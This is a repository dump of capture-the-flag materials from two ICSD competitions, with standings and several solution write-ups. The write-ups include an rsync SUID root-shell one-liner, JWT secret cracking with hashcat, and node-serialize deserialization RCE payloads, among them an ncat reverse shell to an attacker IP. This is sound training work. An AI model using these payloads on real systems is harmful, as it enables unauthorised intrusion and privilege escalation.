![https://i.ibb.co/GW4rP32/Shell-Generated.png](https://i.ibb.co/GW4rP32/Shell-Generated.png) 263 | 264 | ## Privilege Escalation 265 | 266 | After successfully getting reverse shell, we can go for the privilege escalation. 267 | 268 | ```jsx 269 | find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null 270 | ``` 271 | 272 | ![https://i.ibb.co/k11r9W8/findsuids.png](https://i.ibb.co/k11r9W8/findsuids.png) 273 | 274 | It seems `rsync` command has SUID permission, so lets search this in **[GTFOBins](https://gtfobins.github.io/)**. This command is enough to get elevated shell. 275 | 276 | ```jsx 277 | rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null 278 | ``` 279 | 280 | ![https://i.ibb.co/crXc6Mt/root-flag.png](https://i.ibb.co/crXc6Mt/root-flag.png) 281 | 282 | Thank you for Reading!! -------------------------------------------------------------------------------- /Game Of Thrones/Machines/README.md: -------------------------------------------------------------------------------- 1 | Machine images can be installed from [this link](https://drive.google.com/drive/folders/1mJG_11NPdRdBOJevI7wx_VfH41mm01RS?usp=sharing). 2 | -------------------------------------------------------------------------------- /Game Of Thrones/README.md: -------------------------------------------------------------------------------- 1 | # 'Game of Thrones' - Capture the Flag 2 | 3 | As PROSOL, we had the opportunity to host the ICSD 2023 conference - an event dedicated to cybersecurity days for the third time! The event was co-hosted by PROSOL and the State Service for Special Communication and Information Security. 4 | 5 | Within the framework of the event, which took place on September 21-23, 2023, a CTF competition in the format of "Game of Thrones" was organized by the hosts. According to the event schedule, the competition took place on September 22 and lasted for 6 hours. Ten teams, each consisting of three members, competed for a prize pool totaling 3000AZN and additional exciting prizes. 6 | 7 | CyberYashma emerged as the winner of the competition, scoring 220 out of 600 possible points. The second and third place teams (DoublePulsar and ALLSAFE) both achieved a score of 110. 8 | 9 | In this repository, we will share all the materials that we used during the CTF to express our appreciation for open source. Moreover, to support this idea, we have used one easy machine from [vulnhub](https://www.vulnhub.com/entry/election-1,503/) (Callobes)! 10 | 11 | # General Information 12 | 6 vulnerable machines were presented to competitors. Machines were categorized as easy, medium, and hard. Each easy machine provided 50 points, each medium machine 100 points, and each hard machine 150 points, adding up to a total of 600 points. Moreover, competitors were able to access an ELK server where all HTTP logs, as well as each command run on attack boxes, were logged (to read more, please refer to [architecture section](https://github.com/icsd-ctf/ICSD/tree/master/Game%20Of%20Thrones/Architecture/Writeup.md)). This, in theory, should have helped teams find the exact ways other teams exploited the machines and redo the steps to obtain the flags. This way, teams with better overall offensive and defensive skills would come out on top. 13 | 14 | > [!NOTE] 15 | > In addition to the primary challenges, we introduced a secondary challenge: competitors were given the option to destroy the machines (for example delete important system files, block network access etc.) they had successfully exploited. However, there were consequences for this action. 16 | > If other teams detected the destruction of a machine, they would be rewarded with an additional 50 points. On the other hand, the team that destroyed the machine would face a penalty of 20 points and a ban from accessing that specific machine. 17 | > During the CTF, a couple of such incidents occurred where teams did damage the CTF machines. However, none were detected. 18 | 19 | 20 | # Standings 21 | 22 | | Teams/Machines | Callobes | Gitlab | Bytescribe | Captivity | Blitz | Noteapp | Total | 23 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 24 | | CyberYashma | 20 30 | 20 30 | 30 30 - | 30 30 - | - - - - | - - - | 220 | 25 | | DoublePulsar | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 | 26 | | ALLSAFE | 20 30 | - - | 30 30 - | - - - | - - - - | - - - | 110 | 27 | | CBAR_TEAM | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 100 | 28 | | ExploitationUnit | 20 30 | 20 30 | - - - | - - - | - - - - | - - - | 50 | 29 | 30 | Unfortunately, the other 5 teams scored 0 points. 31 | 32 | During the competition, several hints were shared at random time intervals for each machine. These hints even included credentials for the gitlab machine in the format root:base64(password) and 2 CVE numbers! 33 | 34 | The fact that five teams were unable to score any points can be primarily attributed to their limited experience in CTF competitions. It's crucial to stress that this environment is simulated and can be quite challenging, not exactly mirroring real-world penetration testing experiences. Consequently, lower scores should not be seen as indicative of anyone's inability to perform penetration tests or blue teaming effectively. 35 | 36 | 37 | # Some moments from the competition 38 | 39 | ![BAH_7833-min](https://github.com/icsd-ctf/ICSD/assets/147237916/df9af7f6-d4a5-44f6-9cca-9372b5b05eea) 40 | ___ 41 | ![BAH_7813](https://github.com/icsd-ctf/ICSD/assets/147237916/3ff3b80e-477f-45a7-861c-466afbcf4e53) 42 | ___ 43 | ![BAH_7830](https://github.com/icsd-ctf/ICSD/assets/147237916/8a920361-5c47-4d98-a204-261eb71f87c2) 44 | ___ 45 | ![BAH_7822](https://github.com/icsd-ctf/ICSD/assets/147237916/0fe1dbe7-0f48-44a2-9f5f-0dfd4cc9e2cc) 46 | ___ 47 | ![photo_5249282619873546109_y](https://github.com/icsd-ctf/ICSD/assets/147237916/cdd58273-ac0a-4e07-b1d3-224877e32813) 48 | ___ 49 | ![photo_5249282619873546110_y](https://github.com/icsd-ctf/ICSD/assets/147237916/725f2e85-2bca-4b9d-bc92-a8a67c0c4a74) 50 | ___ 51 | ![0W1A1434](https://github.com/icsd-ctf/ICSD/assets/147237916/67f58365-9e1b-4f9e-aa4a-f60b40757342) 52 | ___ 53 | ![BAH_7814](https://github.com/icsd-ctf/ICSD/assets/147237916/e5794b09-4e51-4f2e-8d1e-77ca0c698f09) 54 | ___ 55 | ![BAH_7820](https://github.com/icsd-ctf/ICSD/assets/147237916/a97a0654-4de7-4924-9405-19702406fd85) 56 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ICSD 2 | 3 | In this repository, you will find materials from past CTF competitions held during ICSD (International Cyber Security Days) events. 4 | 5 | Previously hosted events: 6 | 1. 2023 - 'Game of Thrones' 7 | 2. 2024 - 'Who Am I' 8 | -------------------------------------------------------------------------------- /Who Am I/README.md: -------------------------------------------------------------------------------- 1 | # 'Who Am I' - Capture the Flag 2 | 3 | As part of the ICSD 2024 conference, we had the privilege of hosting the Capture the Flag (CTF) competition, Who Am I. 4 | 5 | A total of 20 teams, each consisting of 2-3 participants, competed for a prize pool of 9,000 AZN, with 5,000 AZN awarded to the first-place team, 3,000 AZN to the second, and 1,000 AZN to the third. The competition took place on September 20th, running from 08:30 to 14:15, lasting nearly six hours. 6 | 7 | _Boşver_ emerged as the winner, scoring 1,080 out of a possible 2,100 points. _BHOSploit_ claimed second place with 1,030 points, and _Kabiner_ secured third place with 800 points. 8 | 9 | In this repository, we will share all the challenges used during the competition, along with what we consider to be the correct solutions. Additionally, we will provide statistics on the competitors, teams, and individual questions. 10 | 11 | # General Information 12 | ## Challanges 13 | A total of 12 challenges were presented to the competitors, each consisting of one or more questions, amounting to 31 questions in total. 14 | 15 | Challenges covered various aspects of cybersecurity such as Cryptograhy, OSINT, Steganography, Log Analysis, Disk Forensics, Penetration Testing and Privilege Escalation. Each challenge was assigned a total score, which was distributed across the questions based on their difficulty level. 16 | 17 | 18 | | Challenge Name | Difficulty | Challenge Score | Question Count | Score for each Question | Covers | 19 | |------------------------------|------------|-----------------|----------------|-----------------------------------|-------------------------------------------| 20 | | **C1: Death Token** | Easy | 100 | 1 | 100 | Cryptography | 21 | | **C1: Decode the Escape** | Easy | 100 | 1 | 100 | Cryptography | 22 | | **C3: ANAIS_WATT3RSON** | Easy | 100 | 1 | 100 | OSINT | 23 | | **C4: #exec cmd= “whoami”** | Easy | 125 | 4 | 25, 30, 30, 40 | Steganography, OSINT | 24 | | **C5: Packet Detective** | Easy | 125 | 9 | 10, 10, 10, 10, 10, 15, 15, 20, 25| Forensics, Packet Analysis | 25 | | **C6: Exorcising Sukuna’s Curse** | Medium | 130 | 2 | 60, 70 | Vulnerability Exploitation | 26 | | **C7: Root Reaper Quest** | Medium | 150 | 1 | 150 | Log Analysis | 27 | | **C8: In Quest for Rogue Dragon** | Medium | 170 | 2 | 100, 70 | Reverse Engineering | 28 | | **C9: End of Rumbling** | Hard | 200 | 2 | 100, 100 | Active Directory Exploitation | 29 | | **C10: Shadows Possession Jutsu** | Hard | 250 | 3 | 100, 75, 75 | Forensics, Disk Analysis | 30 | | **C11: Serial Escape** | Hard | 250 | 3 | 100, 100, 50 | Web Exploitation | 31 | | **C12: Mr. Windoclin** | Hard | 300 | 2 | 150, 150 | Vulnerability Exploitation, Docker Escape | 32 | | **Total** | | **2000** | **31** | | | 33 | 34 | > [!NOTE] 35 | > Some challenges may have included references to films or anime shows, but none required knowledge of them to be solved. 36 | 37 | ## Standings 38 | 39 | > [!IMPORTANT] 40 | > All flag submission attempts (whether correct or incorrect) have been logged and are available in 'ctf_submission_logs.csv' file. 41 | 42 | | N% | Team | C1 | C2 | C3 | C4 | C5 | C6 | C7 | C8 | C9 | C10 | C11 | C12 | Score | Extra | Total | 43 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 44 | | 1 | boşver | 100 | - | 100 | 125 | 125 | 130 | 150 | - | - | - | 250 | - | 980 | 100 | 1080 | 45 | | 2 | BHOSsploit | 100 | 100 | 100 | 125 | 125 | 130 | - | - | - | - | 100 | 150 | 930 | 100 | 1030 | 46 | | 3 | Kaniber | 100 | - | 100 | 125 | 125 | - | 150 | - | - | - | 100 | - | 700 | 100 | 800 | 47 | | 4 | SUDOERS | 100 | - | - | 85(+++-) | 100(+-+++-+++) | - | 150 | 100(+-) | - | 100(+--) | - | - | 635 | 100 | 735 | 48 | | 5 | 405 Found | - | - | 100 | 125 | 125 | 130 | 150 | - | - | - | - | - | 630 | 100 | 730 | 49 | | 6 | Felina | 100 | 100 | - | 125 | 125 | 130 | - | - | - | - | - | - | 580 | 100 | 680 | 50 | | 7 | R3d3f3nd | 100 | - | 100 | 125 | 110(+++++-+++) | 130 | - | - | - | - | - | - | 565 | 100 | 665 | 51 | | 8 | Zero Zero | - | - | - | 125 | 110(+++++-+++) | 130 | 150 | - | - | - | - | - | 515 | 100 | 615 | 52 | | 9 | ASCCA | - | - | 100 | 125 | 110(+++++-+++) | - | 150 | - | - | - | - | - | 485 | 100 | 585 | 53 | | 10 | Cerberus | - | - | 100 | 125 | 100(+-+++-+++) | 130 | - | - | - | - | - | - | 455 | 100 | 555 | 54 | | 11 | CyberCell | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 445 | 100 | 545 | 55 | | 12 | FR13NDS | 100 | - | - | 85(+++-) | 115(+-+++++++) | 130 | - | - | - | - | - | - | 430 | 100 | 530 | 56 | | 13 | AzInfosec | - | - | - | 125 | 115(+-+++++++) | 130 | - | - | - | - | - | - | 370 | 100 | 470 | 57 | | 14 | Iron First | - | - | - | 85(+++-) | 110(+++++-+++) | - | 150 | - | - | - | - | - | 345 | 100 | 445 | 58 | | 15 | Cyberstars | 100 | - | - | 85(+++-) | 110(+++++-+++) | - | - | - | - | - | - | - | 295 | 100 | 395 | 59 | | 16 | 127.0.0.Biz | - | - | - | 55(+-+-) | 115(+-+++++++) | - | - | - | - | - | - | - | 170 | 100 | 270 | 60 | | 17 | Leet Duo | - | - | - | 85(+++-) | 20(+-+------) | - | - | - | - | - | - | - | 105 | 100 | 205 | 61 | | 18 | Fourier | - | - | - | 85(+++-) | 10(+--------) | - | - | - | - | - | - | - | 95 | 0 | 95 | 62 | | 19 | CyberSpace | - | - | - | 25(+---) | 10(+--------) | - | - | - | - | - | - | - | 35 | 0 | 35 | 63 | | 20 | Overclock | - | - | - | - | - | - | - | - | - | - | - | -| 0 | 0 | 0 | 64 | 65 | > [!NOTE] 66 | > Extra 100 points are awarded for filling a form about PROCYBERLAB platform. -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/README.md: -------------------------------------------------------------------------------- 1 | **C1 - Death Token Challenge** 2 | 3 | *The Death Token holds twisted truths. Your task is to reconstruct the token by correcting false information hidden in its payload. A mere correction brings you closer to restoring the true power of the token. Can you fix the lies and unlock the token's potential? (Ryuk says it needs to be in JWT format or next token will be named after you)* 4 | 5 | Twisted JWT Token: *eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZWF0aF90aW1lIjo1MTEyMDA3LCJuYW1lIjoiTCIsImtpbGxlciI6IllhZ2FtaSBMaWdodCIsInF1b3RlIjoiV2hhdCBkbyB5b3UgdGhpbmsgb2YgdGhhdCwgTD8gVGhpcyBpcyBteSBwZXJmZWN0IHZpY3RvcnkhIFRIQVQnUyBSSUdIVCwgSSBXSU4hISEhISEhISEiLCJzdGF0dXMiOiJhbGl2ZSJ9.2AUGVcRFfrZ75xL-3TBNcFuGDEkLTc73jsw0ZKWnKWs* 6 | 7 | ![image.png](images/image1.png) 8 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/Writeup.md: -------------------------------------------------------------------------------- 1 | # C1 - Death Token Challange 2 | 3 | In this challenge, we are tasked with correcting false data in a JWT token. When we paste the token into jwt.io, we can see it contains information related to characters from the Death Note series: 4 | 5 | ![image.png](images/image2.png) 6 | 7 | First, we cracked the JWT token using the following command: 8 | 9 | `hashcat -a 0 -m 16500 jwt.txt rockyou.txt` 10 | 11 | ![image.png](images/image3.png) 12 | 13 | As we can see, the key is "death". Now, addressing the false data issue—without even knowing the plot, we can spot something suspicious. The name of the character is "L", there is a killer named "Yagami Light", but the status says "alive"? That seems odd. A quick search confirms that Yagami indeed killed L. So, what we need to change in the payload is the status. We update "alive" to "death" (which makes sense, given the key is "death" too): 14 | 15 | ![image.png](images/image4.png) 16 | 17 | And with that, we’ve created the correct token that Ryuk was after. He’s satisfied now, and he’s letting you go… or are you his next source of entertainment? 18 | 19 | ![image.png](images/image.jpg) -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image.jpg -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C1 - Death Token Challenge/images/image4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/README.md: -------------------------------------------------------------------------------- 1 | **C10: Shadows Possession Jutsu** 2 | 3 | *A hidden threat lurks in the network, moving like a shadow possession jutsu, silently altering systems. The attacker’s strategy mirrors Shikamaru’s genius—calculated, precise, and hard to trace. As a shinobi investigator, your mission is to uncover the faint trails left behind, crack the coded mysteries like deciphering enemy jutsu, and stop the threat before it spreads like the Akatsuki’s influence. The fate of the network depends on your ability to outwit this unseen adversary—will you illuminate the shadows, or fall prey to their cunning?* 4 | 5 | ![image.png](images/image%2012.png) -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/Writeup.md: -------------------------------------------------------------------------------- 1 | # C10 - Shadows Possession Jutsu: 2 | 3 | When we start the machine, we notice several tools and a file available: 4 | 5 | - **AccessData FTK Imager**: This tool is used for both acquiring and analyzing image files. 6 | - **HxD**: A tool designed for editing a file's bytes. 7 | - **icsd.001**: Upon examining the headers, we can identify that this is an NTFS file system image. 8 | 9 | ![image.png](images/image.png) 10 | 11 | However, when we attempt to open the file in FTK Imager, it shows as an unrecognized file system. This could be caused by corrupted header and footer bytes. 12 | 13 | ![image.png](images/image%201.png) 14 | 15 | Therefore, we open the file again in HxD and look for header and footer bytes. 16 | 17 | When investigating the header and footer bytes for NTFS file system we see that it should be like this: 18 | 19 | - **Bytes 0x03–0x0A**: Signature "NTFS". 20 | - Last 2 bytes of MBR (first sector of NTFS) should be 55 AA. 21 | 22 | After correcting these bytes with HxD, FTK Imager can identify and analyze the file system. 23 | [4] 85 → 54, 24 | 25 | [510-511] 22 55 → 55 AA 26 | 27 | ![image.png](images/image%202.png) 28 | 29 | After examining the recycle bin and the user desktop, we discovered a **password** and a **ZIP file**. The first assumption is that the password might be used to unlock the ZIP file. 30 | 31 | ![image.png](images/image%203.png) 32 | 33 | ![image.png](images/image%204.png) 34 | 35 | Content of the pw.txt is “hello123” 36 | 37 | And there is a txt file in the found zip file 38 | 39 | ![image.png](images/image%205.png) 40 | 41 | Let us extract and read the file with the winrar to be able to provide password. 42 | 43 | ![image.png](images/image%206.png) 44 | 45 | The answer of the first question is the “U2hpbWlzaGFv”. 46 | 47 | 1. Question is “What malware is used for persistence?”. 48 | 49 | Lets look at registries for autorun. 50 | 51 | We need to look at “Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” 52 | 53 | In order to find that key we need to extract “C:\Users\icsd\ntuser.dat*” files. 54 | 55 | ![image.png](images/image%207.png) 56 | 57 | ![image.png](images/image%208.png) 58 | 59 | After viewing that registry with “Registry Editor” we find the naswer is “gh0st.exe” 60 | 61 | ![image.png](images/image%209.png) 62 | 63 | 1. What is the name of the flash disk used to install the malware? 64 | 65 | In order to find the inserted flash disks we need to look for 66 | 67 | “Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Enum\USBSTOR” 68 | 69 | registry. 70 | 71 | We need to extract “C:\Windows\system32\config\SYSTEM*” files for that. 72 | 73 | ![image.png](images/image%2010.png) 74 | 75 | ![image.png](images/image%2011.png) 76 | 77 | Answer is “SanDisk” 78 | 79 | To Sum Up 80 | 81 | Questions: 82 | 83 | 1. What is the content of the data.zip? “U2hpbWlzaGFv” 84 | 2. What malware is used for persistence? “gh0st.exe” 85 | 3. What is the name of the flash disk used to install the malware? “sandisk” -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 12.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C10 - Shadows Possession Jutsu/images/image.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/README.md: -------------------------------------------------------------------------------- 1 | # Serial Escape 2 | 3 | Exploit vulnerabilities in the web application, gain access to the underlying machine, and escalate your privileges to become the root user. 4 | 5 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/Writeup.md: -------------------------------------------------------------------------------- 1 | # Serial Escape 2 | 3 | You can begin by running a basic NMAP scan on the target. 4 | 5 | ```bash 6 | nmap -sV -v <target IP> 7 | ``` 8 | 9 | ![image](./images/2024-09-25_17h30_17.png) 10 | 11 | Based on the NMAP result, there are two open ports: SSH (22) and HTTP (80). 12 | If you navigate to the target IP address on a browser you will see a page as follows. 13 | 14 | ![image](./images/2024-09-25_17h30_48.png) 15 | 16 | Based on the error message, you can understand that the base URL "/" requires authentication to visit. 17 | 18 | To discover directories on the web application, you can use a directory brute-forcing tool like FFUF. This revealed an additional directory named 'dev', which also requires authentication. 19 | 20 | ![image](./images/2024-09-25_17h29_25.png) 21 | 22 | When you navigate to the registration page to create a new user, you will see that the form requires you to enter an email address ending with "@oracle.az" only. 23 | 24 | ![image](./images/2024-09-25_17h31_16.png) 25 | 26 | Upon registering, the application sends an OTP code to the provided email for verification, ensuring that users cannot create accounts with fake email addresses. However, after further inspection, you can notice that the email validation (checking if it ends with '@oracle.az') is only performed on the client side. 27 | 28 | ![image](./images/2024-09-25_18h56_23.png) 29 | 30 | You can complete the registration form with dummy data, capture the network traffic using Burp Suite, and modify the email field to use an address of your choice — either a personal email or a temporary/disposable one to receive the OTP and complete verification. For demonstration purposes, a temporary email was used. 31 | 32 | https://temp-mail.org/ 33 | 34 | ![image](./images/2024-09-25_17h36_49.png) 35 | 36 | Once you have placed a valid email address you can forward the traffic, which will send an OTP to the provided address. 37 | 38 | ![image](./images/2024-09-25_17h38_46.png) 39 | 40 | To complete the registration process, enter the OTP code and submit. 41 | 42 | ![image](./images/2024-09-25_17h39_16.png) 43 | ![image](./images/2024-09-25_17h39_31.png) 44 | 45 | As a result, you will be redirected to the login page with a success message indicating that you have successfully created a new user. 46 | Having a user on the web application you can now log in. On the home page, you will see the first flag for the CTF. 47 | 48 | ![image](./images/2024-09-25_17h39_50.png) 49 | 50 | Since you now have a valid user, you can visit the "dev" directory discovered earlier while directory brute-forcing with FFUF. 51 | On the "dev" directory you will see two files: notes.txt and source.zip 52 | 53 | ![image](./images/2024-09-25_17h41_34.png) 54 | 55 | The notes.txt file contains a message titled 'Security Alert,' highlighting a critical vulnerability in the application originating from a package called ```node-serialize```. 56 | According to this message, you can understand that your next step will be downloading the source code of the web app (```/dev/source.zip```) and analyzing it to move the attack further. 57 | 58 | ![image](./images/2024-09-25_17h41_42.png) 59 | 60 | To begin your code review, start with the ```app.js``` file. In the ```app.js``` file, you'll again notice a warning comment regarding the ```node-serialize``` package. 61 | 62 | ![image](./images/2024-09-27_22h13_01.png) 63 | 64 | To identify what the node-serialize package is vulnerable to, you can search online. You'll discover that it has a critical vulnerability: arbitrary remote code execution, which is explained in the following link. This vulnerability specifically affects the ```unserialize``` function, according to the explanation. 65 | https://security.snyk.io/vuln/npm:node-serialize:20170208 66 | 67 | Knowing that the web application is vulnerable to remote code execution, you can examine the source code further to find out where and how the ```node-serialize``` package is used. By searching in the ```app.js``` file, you'll find that the vulnerable package is passed to the ```home``` router after being imported. 68 | 69 | ![image](./images/2024-09-25_17h45_54.png) 70 | 71 | To understand how and for what functionality of the web application the ```node-serialize``` package is used, open the JavaScript file responsible for the home page. 72 | Upon reviewing the code, two key points emerge: 73 | * When a user searches for a keyword, it is taken from the request, serialized, and stored in a cookie named ```last_search```. 74 | * During each GET request to the home page, the value of the ```last_search``` cookie is retrieved, **_UNSERIALIZED_** (which is the vulnerable part), and passed to the client side to be displayed. 75 | 76 | This functionality allows users to see their most recent search by storing its value in a cookie. 77 | 78 | ![image](./images/2024-09-25_17h54_27.png) 79 | 80 | In the image below, you can see an example usage of this functionality. 81 | 82 | ![image](./images/2024-09-25_18h12_04.png) 83 | 84 | As your next step, you have to craft such a payload that will execute system commands on the target website. 85 | You can find an example payload from the link provided earlier. 86 | 87 | ```javascript 88 | {"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"} 89 | ``` 90 | 91 | To adjust the payload for our target application, we need to strip away the dictionary structure, remove enclosing double quotes, escape characters, leaving only the core payload. 92 | 93 | To test if the payload works, we can attempt to ping our attacking machine and verify whether the injected system command is executed. To detect the ping requests, start a ```tcpdump``` on the attacker machine to monitor ICMP traffic. 94 | 95 | ```javascript 96 | _$$ND_FUNC$$_function (){require('child_process').exec('ping <attacker IP> -c 3', function(error, stdout, stderr) { console.log(stdout) });}() 97 | ``` 98 | 99 | Keep in mind that for successful code execution, the payload must first be sent to the web application. After that, you need to send another search keyword. This way, the payload becomes your previous search query and gets unserialized when accessing the home page. The vulnerability, as mentioned earlier, lies in the unserialize function of the package, not the serialize function. 100 | 101 | Once the payload above is injected, you will observe six ICMP packets: three requests and three replies. 102 | 103 | ![image](./images/2024-09-25_18h22_19.png) 104 | 105 | Confirming that the payload works, you can modify the payload to get a reverse shell. 106 | 107 | ```javascript 108 | _$$ND_FUNC$$_function (){require('child_process').exec('ncat <attacker IP> <attacker Port> -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });}() 109 | ``` 110 | 111 | Upon injection of the payload above, you will get a reverse shell under the "www-data" user, which will enable you to grab the second flag for the CTF. 112 | 113 | ![image](./images/2024-09-25_18h24_52.png) 114 | ![image](./images/2024-09-25_18h35_11.png) 115 | 116 | Moving on you can start looking around for a vulnerability/misconfiguration leading to privilege escalation. 117 | As a result of executing the ```sudo -l``` command, you can see that the www-data user is allowed to run the following command with ```sudo``` privileges. 118 | 119 | ``` 120 | /usr/bin/apt edit-sources ../* 121 | ``` 122 | ![image](./images/2024-09-25_18h30_58.png) 123 | 124 | Executing the command ```sudo /usr/bin/apt edit-sources ../foo``` will present you with multiple options to choose a text editor. For privilege escalation, you can select either ```nano``` or ```vim```. Since these editors will run with sudo privileges, you can implement techniques to escalate your privileges. Both editors have techniques for privilege escalation, which you can find in the following links: 125 | 126 | https://gtfobins.github.io/gtfobins/vim/#sudo 127 | 128 | https://gtfobins.github.io/gtfobins/nano/#sudo 129 | 130 | ![image](./images/2024-09-25_18h33_34.png) 131 | 132 | As a result, you will gain elevated privileges on the target machines under the root user and will be able to read the last flag for the CTF. 133 | 134 | ![image](./images/2024-09-25_18h34_12.png) -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial 